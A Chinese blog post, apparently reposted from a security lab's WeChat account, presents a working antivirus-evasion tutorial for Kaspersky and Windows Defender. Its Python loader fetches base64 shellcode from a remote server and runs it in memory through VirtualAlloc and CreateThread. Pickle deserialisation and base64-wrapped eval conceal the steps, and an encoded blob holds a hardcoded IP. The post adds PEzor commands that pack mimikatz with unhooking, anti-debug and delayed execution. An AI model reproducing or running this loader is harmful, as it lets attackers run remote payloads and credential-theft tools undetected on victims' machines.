测试免杀过卡巴斯基和window defender

  • A+
所属分类:安全文章



测试的时候,好像是都过了.


因为网上的demo已经报毒很多了,然后就想这修改一下.





主要思想



    是运用了反序列化,分离shellcode,敏感函数base64加密eval()执行.


import tkinter as tkimport base64import ctypesimport urllib.requestimport codecsimport pickle

def change():var=entry.get()b64=str(base64.b64encode(var.encode("utf-8")), "utf-8")print(str(b64))code = """import codecs,urllib.request,ctypescode = urllib.request.urlopen('http://vps的ip/code.txt').read()code = base64.b64decode(code)code =codecs.escape_decode(code)[0]code = bytearray(code)

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000), ctypes.c_int(0x40))buf = (ctypes.c_char * len(code)).from_buffer(code)

string=b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KAogICAgICAgIGN0eXBlcy5jX3VpbnQ2NChwdHIpLCAKICAgICAgICBidWYsIAogICAgICAgIGN0eXBlcy5jX2ludChsZW4oY29kZSkpCiAgICAp'eval(str(base64.b64decode(string),'utf-8'))handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""class A(object):def __reduce__(self):return (exec, (code,))ret = pickle.dumps(A())ret_base64 = base64.b64encode(ret)print(ret_base64)if __name__ == '__main__':window = tk.Tk()window.title("免杀shellcode -雷石安全")window.geometry('300x60+200+300')entry = tk.Entry(window, width=40)entry.pack()button=tk.Button(window,text='生成',command=change).pack()window.mainloop()


测试免杀过卡巴斯基和window defender


第一步:


生成payload


第二步:


测试免杀过卡巴斯基和window defender


    放如小框框中,点击生成,会出现两个值:


    第一个值为base64后的需要分离的shellcode,放到服务器中


测试免杀过卡巴斯基和window defender


    用python开一个小服务器(可以去访问看看,通没通).


    第两个值,为我们反序列化后的代码,中间那一群绿绿的代码,都会在我们反序列化的时候自动执行.


    加载器py:


import base64,pickleshellcode =b'gASV4gMAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFjDAwAACmltcG9ydCBjb2RlY3MsdXJsbGliLnJlcXVlc3QsY3R5cGVzCmNvZGUgPSB1cmxsaWIucmVxdWVzdC51cmxvcGVuKCdodHRwOi8vNDcuMTEyLjI0Mi43MC9jb2RlLnR4dCcpLnJlYWQoKQpjb2RlID0gYmFzZTY0LmI2NGRlY29kZShjb2RlKQpjb2RlID1jb2RlY3MuZXNjYXBlX2RlY29kZShjb2RlKVswXQpjb2RlID0gYnl0ZWFycmF5KGNvZGUpCgpjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CgpwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludChsZW4oY29kZSkpLCBjdHlwZXMuY19pbnQoMHgzMDAwKSwgY3R5cGVzLmNfaW50KDB4NDApKQpidWYgPSAoY3R5cGVzLmNfY2hhciAqIGxlbihjb2RlKSkuZnJvbV9idWZmZXIoY29kZSkKICAgIApzdHJpbmc9YidZM1I1Y0dWekxuZHBibVJzYkM1clpYSnVaV3d6TWk1U2RHeE5iM1psVFdWdGIzSjVLQW9nSUNBZ0lDQWdJR04wZVhCbGN5NWpYM1ZwYm5RMk5DaHdkSElwTENBS0lDQWdJQ0FnSUNCaWRXWXNJQW9nSUNBZ0lDQWdJR04wZVhCbGN5NWpYMmx1ZENoc1pXNG9ZMjlrWlNrcENpQWdJQ0FwJwpldmFsKHN0cihiYXNlNjQuYjY0ZGVjb2RlKHN0cmluZyksJ3V0Zi04JykpCmhhbmRsZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuQ3JlYXRlVGhyZWFkKAogICAgICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICAgICAgY3R5cGVzLmNfaW50KDApLCAKICAgICAgICBjdHlwZXMuY191aW50NjQocHRyKSwgCiAgICAgICAgY3R5cGVzLmNfaW50KDApLCAKICAgICAgICBjdHlwZXMuY19pbnQoMCksIAogICAgICAgIGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkKKQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLldhaXRGb3JTaW5nbGVPYmplY3QoY3R5cGVzLmNfaW50KGhhbmRsZSksY3R5cGVzLmNfaW50KC0xKSkKlIWUUpQu'#pickle.loads(base64.b64decode(shellcode))strinq=b'cGlja2xlLmxvYWRzKGJhc2U2NC5iNjRkZWNvZGUoY29kZSkp'eval(str(base64.b64decode(strinq),'utf-8'))


    带进去生成的第二个值


    直接运行,或者


pyinstaller -F loader.py --noconsole -i 13.ico


    生成exe(内部pyc)文件,当然脚本把它反编译出来pyc,然后查看源码(https://tool.lu/pyc/)不错的网址.


测试免杀过卡巴斯基和window defender


测试免杀过卡巴斯基和window defender


测试免杀过卡巴斯基和window defender


测试免杀过卡巴斯基和window defender


测试免杀过卡巴斯基和window defender





补充




    这些显示不够,比如猕猴桃怎么免杀呢?


    推荐一个在红队学院星球看到的项目(当然这个可以在,去特征字符串以后再次加固)

    PEzor


git clone https://github.com/phra/PEzor.gitcd PEzorsudo bash install.shbash PEzor.sh –h


测试免杀过卡巴斯基和window defender


  安装完会报错


下载https://github.com/EgeBalci/sgn,解压后放入PEzor的目录


然后


export PATH=$PATH:~/go/bin/:/root/dvwa/PEzor:/root/dvwa/PEzor/deps/donut_v0.9.3/:/root/dvwa/PEzor/deps/wclang/_prefix_PEzor_/bin/


注意:/home/dvwa/PEzor,要是自己的路径


而且此命令只在当前shell下有效


测试免杀过卡巴斯基和window defender


输入后便可以愉快的玩耍了.


比如,休眠120秒上线的mimikatz


PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz.exe  -z 2




end



测试免杀过卡巴斯基和window defender


本文始发于微信公众号(雷石安全实验室):测试免杀过卡巴斯基和window defender

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: